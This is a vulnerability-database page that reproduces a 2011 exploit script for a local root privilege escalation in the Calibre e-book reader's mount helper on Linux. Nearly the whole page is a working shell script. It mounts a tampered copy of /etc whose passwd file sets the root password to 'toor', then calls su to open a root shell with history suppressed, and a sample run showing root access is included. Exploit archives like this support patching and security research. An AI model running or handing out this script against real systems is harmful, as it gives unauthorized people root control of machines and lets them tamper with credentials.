Vulners
Lucene search
Calibre E-Book Reader - Local Privilege Escalation (2)
# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh
#######################################
# .60-Calibrer Assault Mount #
# by zx2c4 #
#######################################
################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundumental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker /etc/passwd and make the root password
# temporarily "toor".
#
# - zx2c4
# 2011-11-2
#
# Usage:
# $ ./60calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal]
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################
echo "#######################################"
echo "# .60-Calibrer Assault Mount #"
echo "# by zx2c4 #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
calibre-mount-helper mount overlay /etc >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Nov 2011 00:00Current
7.4High risk
Vulners AI Score7.4